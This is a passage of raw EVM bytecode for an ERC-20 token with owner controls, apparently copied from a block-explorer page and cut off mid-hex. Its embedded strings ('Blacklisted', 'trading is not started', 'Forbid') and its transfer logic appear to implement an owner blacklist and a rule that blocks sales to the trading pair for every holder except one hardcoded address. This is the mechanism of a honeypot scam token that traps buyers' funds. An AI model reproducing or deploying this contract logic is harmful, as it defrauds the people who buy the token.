025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6105a1610cfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610620576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161061790611bfb565b60405180910390fd5b6106348561062c610cfe565b858403610d05565b60019150509392505050565b5f6012905090565b5f6106e5610654610cfe565b848460025f610661610cfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546106e09190611c46565b610d05565b6001905092915050565b6106f7610cfe565b73ffffffffffffffffffffffffffffffffffffffff166107156109cc565b73ffffffffffffffffffffffffffffffffffffffff161461076b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161076290611cc3565b60405180910390fd5b8360085f6101000a81548160ff0219169083151502179055508260065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508160098190555080600a8190555050505050565b6107e0610cfe565b73ffffffffffffffffffffffffffffffffffffffff166107fe6109cc565b73ffffffffffffffffffffffffffffffffffffffff1614610854576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084b90611cc3565b60405180910390fd5b80600b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b6108b63382611200565b50565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f600754905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610935610cfe565b73ffffffffffffffffffffffffffffffffffffffff166109536109cc565b73ffffffffffffffffffffffffffffffffffffffff16146109a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a090611cc3565b60405180910390fd5b6109b25f6113ce565b565b60085f9054906101000a900460ff1681565b60095481565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610a0290611b5b565b80601f0160208091040260200160405190810160405280929190818152602001828054610a2e90611b5b565b8015610a795780601f10610a5057610100808354040283529160200191610a79565b820191905f5260205f20905b815481529060010190602001808311610a5c57829003601f168201915b5050505050905090565b5f8060025f610a90610cfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610b4a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4190611d51565b60405180910390fd5b610b5e610b55610cfe565b85858403610d05565b600191505092915050565b5f610b7c610b75610cfe565b8484610ec8565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610c10610cfe565b73ffffffffffffffffffffffffffffffffffffffff16610c2e6109cc565b73ffffffffffffffffffffffffffffffffffffffff1614610c84576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7b90611cc3565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cf2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce990611ddf565b60405180910390fd5b610cfb816113ce565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6a90611e6d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610de1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd890611efb565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ebb9190611934565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d90611f89565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fa4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9b90612017565b60405180910390fd5b610faf83838361148f565b73036ad81ef09eb9a2961d9e57c1ba462102cd3a1f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561104b575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561106f575f60018261105e9190611c46565b9050600754811061106d575f80fd5b505b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156110f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ea906120a5565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546111839190611c46565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111e79190611934565b60405180910390a36111fa848484611763565b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361126e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161126590612133565b60405180910390fd5b611279825f8361148f565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156112fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f4906121c1565b60405180910390fd5b81810360015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160035f82825461135291906121df565b925050819055505f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113b69190611934565b60405180910390a36113c9835f84611763565b505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615801561152d5750600b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b61156c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115639061225c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603611677576115c86109cc565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16148061163357506116046109cc565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b611672576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611669906122c4565b60405180910390fd5b61175e565b60085f9054906101000a900460ff1680156116de575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b1561175d57600954816116f0846108e7565b6116fa9190611c46565b1115801561171d5750600a5481611710846108e7565b61171a9190611c46565b10155b61175c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117539061232c565b60405180910390fd5b5b5b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6117aa82611768565b6117b48185611772565b93506117c4818560208601611782565b6117cd81611790565b840191505092915050565b5f6020820190508181035f8301526117f081846117a0565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611825826117fc565b9050919050565b6118358161181b565b811461183f575f80fd5b50565b5f813590506118508161182c565b92915050565b5f819050919050565b61186881611856565b8114611872575f80fd5b50565b5f813590506118838161185f565b92915050565b5f806040838503121561189f5761189e6117f8565b5b5f6118ac85828601611842565b92505060206118bd85828601611875565b9150509250929050565b5f8115159050919050565b6118db816118c7565b82525050565b5f6020820190506118f45f8301846118d2565b92915050565b5f6020828403121561190f5761190e6117f8565b5b5f61191c84828501611842565b91505092915050565b61192e81611856565b82525050565b5f6020820190506119475f830184611925565b92915050565b5f805f60608486031215611964576119636117f8565b5b5f61197186828701611842565b935050602061198286828701611842565b925050604061199386828701611875565b9150509250925092565b5f60ff82169050919050565b6119b28161199d565b82525050565b5f6020820190506119cb5f8301846119a9565b92915050565b6119da816118c7565b81146119e4575f80fd5b50565b5f813590506119f5816119d1565b92915050565b5f805f8060808587031215611a1357611a126117f8565b5b5f611a20878288016119e7565b9450506020611a3187828801611842565b9350506040611a4287828801611875565b9250506060611a5387828801611875565b91505092959194509250565b5f8060408385031215611a7557611a746117f8565b5b5f611a8285828601611842565b9250506020611a93858286016119e7565b9150509250929050565b5f60208284031215611ab257611ab16117f8565b5b5f611abf84828501611875565b91505092915050565b611ad18161181b565b82525050565b5f602082019050611aea5f830184611ac8565b92915050565b5f8060408385031215611b0657611b056117f8565b5b5f611b1385828601611842565b9250506020611b2485828601611842565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611b7257607f821691505b602082108103611b8557611b84611b2e565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f611be5602883611772565b9150611bf082611b8b565b604082019050919050565b5f6020820190508181035f830152611c1281611bd9565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611c5082611856565b9150611c5b83611856565b9250828201905080821115611c7357611c72611c19565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611cad602083611772565b9150611cb882611c79565b602082019050919050565b5f6020820190508181035f830152611cda81611ca1565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611d3b602583611772565b9150611d4682611ce1565b604082019050919050565b5f6020820190508181035f830152611d6881611d2f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611dc9602683611772565b9150611dd482611d6f565b604082019050919050565b5f6020820190508181035f830152611df681611dbd565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611e57602483611772565b9150611e6282611dfd565b604082019050919050565b5f6020820190508181035f830152611e8481611e4b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611ee5602283611772565b9150611ef082611e8b565b604082019050919050565b5f6020820190508181035f830152611f1281611ed9565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611f73602583611772565b9150611f7e82611f19565b604082019050919050565b5f6020820190508181035f830152611fa081611f67565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612001602383611772565b915061200c82611fa7565b604082019050919050565b5f6020820190508181035f83015261202e81611ff5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61208f602683611772565b915061209a82612035565b604082019050919050565b5f6020820190508181035f8301526120bc81612083565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f206164647265735f8201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b5f61211d602183611772565b9150612128826120c3565b604082019050919050565b5f6020820190508181035f83015261214a81612111565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e5f8201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b5f6121ab602283611772565b91506121b682612151565b604082019050919050565b5f6020820190508181035f8301526121d88161219f565b9050919050565b5f6121e982611856565b91506121f483611856565b925082820390508181111561220c5761220b611c19565b5b92915050565b7f426c61636b6c69737465640000000000000000000000000000000000000000005f82015250565b5f612246600b83611772565b915061225182612212565b602082019050919050565b5f6020820190508181035f8301526122738161223a565b9050919050565b7f74726164696e67206973206e6f742073746172746564000000000000000000005f82015250565b5f6122ae601683611772565b91506122b98261227a565b602082019050919050565b5f6020820190508181035f8301526122db816122a2565b9050919050565b7f466f7262696400000000000000000000000000000000000000000000000000005f82015250565b5f612316600683611772565b9150612321826122e2565b602082019050919050565b5f6020820190508181035f8301526123438161230a565b905091905056fea2646970667358221220142e1915218782ff5d88d8d7cf0c471b5a9e7dc87de8b06a035fa49595d459c364736f6c63430008190033000000000000000000000000000000000000000000000000000000003b9aca00

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061014b575f3560e01c806349bd5a5e116100c15780638da5cb5b1161007a5780638da5cb5b1461038d57806395d89b41146103ab578063a457c2d7146103c9578063a9059cbb146103f9578063dd62ed3e14610429578063f2fde38b146104595761014b565b806349bd5a5e146102db5780635d9be414146102f957806370a0823114610317578063715018a614610347578063860a32ec1461035157806389f9a1d31461036f5761014b565b806323b872dd1161011357806323b872dd14610209578063313ce5671461023957806339509351146102575780633aa633aa14610287578063404e5129146102a357806342966c68146102bf5761014b565b806306fdde031461014f578063095ea7b31461016d57806316c021291461019d57806318160ddd146101cd5780631ab99e12146101eb575b5f80fd5b610157610475565b60405161016491906117d8565b60405180910390f35b61018760048036038101906101829190611889565b610505565b60405161019491906118e1565b60405180910390f35b6101b760048036038101906101b291906118fa565b610522565b6040516101c491906118e1565b60405180910390f35b6101d561053f565b6040516101e29190611934565b60405180910390f35b6101f3610548565b6040516102009190611934565b60405180910390f35b610223600480360381019061021e919061194d565b61054e565b60405161023091906118e1565b60405180910390f35b610241610640565b60405161024e91906119b8565b60405180910390f35b610271600480360381019061026c9190611889565b610648565b60405161027e91906118e1565b60405180910390f35b6102a1600480360381019061029c91906119fb565b6106ef565b005b6102bd60048036038101906102b89190611a5f565b6107d8565b005b6102d960048036038101906102d49190611a9d565b6108ac565b005b6102e36108b9565b6040516102f09190611ad7565b60405180910390f35b6103016108de565b60405161030e9190611934565b60405180910390f35b610331600480360381019061032c91906118fa565b6108e7565b60405161033e9190611934565b60405180910390f35b61034f61092d565b005b6103596109b4565b60405161036691906118e1565b60405180910390f35b6103776109c6565b6040516103849190611934565b60405180910390f35b6103956109cc565b6040516103a29190611ad7565b60405180910390f35b6103b36109f3565b6040516103c091906117d8565b60405180910390f35b6103e360048036038101906103de9190611889565b610a83565b6040516103f091906118e1565b60405180910390f35b610413600480360381019061040e9190611889565b610b69565b60405161042091906118e1565b60405180910390f35b610443600480360381019061043e9190611af0565b610b86565b6040516104509190611934565b60405180910390f35b610473600480360381019061046e91906118fa565b610c08565b005b60606004805461048490611b5b565b80601f01602080910402602001604051908101604052809291908181526020018280546104b090611b5b565b80156104fb5780601f106104d2576101008083540402835291602001916104fb565b820191905f5260205f20905b8154815290600101906020018083116104de57829003601f168201915b5050505050905090565b5f610518610511610cfe565b8484610d05565b6001905092915050565b600b602052805f5260405f205f915054906101000a900460ff1681565b5f600354905090565b600a5481565b5f61055a848484610ec8565b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6105a1610cfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610620576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161061790611bfb565b60405180910390fd5b6106348561062c610cfe565b858403610d05565b60019150509392505050565b5f6012905090565b5f6106e5610654610cfe565b848460025f610661610cfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546106e09190611c46565b610d05565b6001905092915050565b6106f7610cfe565b73ffffffffffffffffffffffffffffffffffffffff166107156109cc565b73ffffffffffffffffffffffffffffffffffffffff161461076b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161076290611cc3565b60405180910390fd5b8360085f6101000a81548160ff0219169083151502179055508260065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508160098190555080600a8190555050505050565b6107e0610cfe565b73ffffffffffffffffffffffffffffffffffffffff166107fe6109cc565b73ffffffffffffffffffffffffffffffffffffffff1614610854576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084b90611cc3565b60405180910390fd5b80600b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b6108b63382611200565b50565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f600754905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610935610cfe565b73ffffffffffffffffffffffffffffffffffffffff166109536109cc565b73ffffffffffffffffffffffffffffffffffffffff16146109a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a090611cc3565b60405180910390fd5b6109b25f6113ce565b565b60085f9054906101000a900460ff1681565b60095481565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610a0290611b5b565b80601f0160208091040260200160405190810160405280929190818152602001828054610a2e90611b5b565b8015610a795780601f10610a5057610100808354040283529160200191610a79565b820191905f5260205f20905b815481529060010190602001808311610a5c57829003601f168201915b5050505050905090565b5f8060025f610a90610cfe565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610b4a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4190611d51565b60405180910390fd5b610b5e610b55610cfe565b85858403610d05565b600191505092915050565b5f610b7c610b75610cfe565b8484610ec8565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610c10610cfe565b73ffffffffffffffffffffffffffffffffffffffff16610c2e6109cc565b73ffffffffffffffffffffffffffffffffffffffff1614610c84576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7b90611cc3565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cf2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce990611ddf565b60405180910390fd5b610cfb816113ce565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6a90611e6d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610de1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd890611efb565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ebb9190611934565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d90611f89565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fa4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9b90612017565b60405180910390fd5b610faf83838361148f565b73036ad81ef09eb9a2961d9e57c1ba462102cd3a1f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561104b575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561106f575f60018261105e9190611c46565b9050600754811061106d575f80fd5b505b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156110f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ea906120a5565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546111839190611c46565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111e79190611934565b60405180910390a36111fa848484611763565b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361126e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161126590612133565b60405180910390fd5b611279825f8361148f565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156112fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f4906121c1565b60405180910390fd5b81810360015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160035f82825461135291906121df565b925050819055505f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113b69190611934565b60405180910390a36113c9835f84611763565b505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615801561152d5750600b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b61156c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115639061225c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603611677576115c86109cc565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16148061163357506116046109cc565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b611672576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611669906122c4565b60405180910390fd5b61175e565b60085f9054906101000a900460ff1680156116de575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b1561175d57600954816116f0846108e7565b6116fa9190611c46565b1115801561171d5750600a5481611710846108e7565b61171a9190611c46565b10155b61175c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117539061232c565b60405180910390fd5b5b5b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6117aa82611768565b6117b48185611772565b93506117c4818560208601611782565b6117cd81611790565b840191505092915050565b5f6020820190508181035f8301526117f081846117a0565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611825826117fc565b9050919050565b6118358161181b565b811461183f575f80fd5b50565b5f813590506118508161182c565b92915050565b5f819050919050565b61186881611856565b8114611872575f80fd5b50565b5f813590506118838161185f565b92915050565b5f806040838503121561189f5761189e6117f8565b5b5f6118ac85828601611842565b92505060206118bd85828601611875565b9150509250929050565b5f8115159050919050565b6118db816118c7565b82525050565b5f6020820190506118f45f8301846118d2565b92915050565b5f6020828403121561190f5761190e6117f8565b5b5f61191c84828501611842565b91505092915050565b61192e81611856565b82525050565b5f6020820190506119475f830184611925565b92915050565b5f805f60608486031215611964576119636117f8565b5b5f61197186828701611842565b935050602061198286828701611842565b925050604061199386828701611875565b9150509250925092565b5f60ff82169050919050565b6119b28161199d565b82525050565b5f6020820190506119cb5f8301846119a9565b92915050565b6119da816118c7565b81146119e4575f80fd5b50565b5f813590506119f5816119d1565b92915050565b5f805f8060808587031215611a1357611a126117f8565b5b5f611a20878288016119e7565b9450506020611a3187828801611842565b9350506040611a4287828801611875565b9250506060611a5387828801611875565b91505092959194509250565b5f8060408385031215611a7557611a746117f8565b5b5f611a8285828601611842565b9250506020611a93858286016119e7565b9150509250929050565b5f60208284031215611ab257611ab16117f8565b5b5f611abf84828501611875565b91505092915050565b611ad18161181b565b82525050565b5f602082019050611aea5f830184611ac8565b92915050565b5f8060408385031215611b0657611b056117f8565b5b5f611b1385828601611842565b9250506020611b2485828601611842565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611b7257607f821691505b602082108103611b8557611b84611b2e565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f611be5602883611772565b9150611bf082611b8b565b604082019050919050565b5f6020820190508181035f830152611c1281611bd9565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611c5082611856565b9150611c5b83611856565b9250828201905080821115611c7357611c72611c19565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611cad602083611772565b9150611cb882611c79565b602082019050919050565b5f6020820190508181035f830152611cda81611ca1565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611d3b602583611772565b9150611d4682611ce1565b604082019050919050565b5f6020820190508181035f830152611d6881611d2f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611dc9602683611772565b9150611dd482611d6f565b604082019050919050565b5f6020820190508181035f830152611df681611dbd565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611e57602483611772565b9150611e6282611dfd565b604082019050919050565b5f6020820190508181035f830152611e8481611e4b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611ee5602283611772565b9150611ef082611e8b565b604082019050919050565b5f6020820190508181035f830152611f1281611ed9565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611f73602583611772565b9150611f7e82611f19565b604082019050919050565b5f6020820190508181035f830152611fa081611f67565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f612001602383611772565b915061200c82611fa7565b604082019050919050565b5f6020820190508181035f83015261202e81611ff5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61208f602683611772565b915061209a82612035565b604082019050919050565b5f6020820190508181035f8301526120bc81612083565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f206164647265735f8201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b5f61211d602183611772565b9150612128826120c3565b604082019050919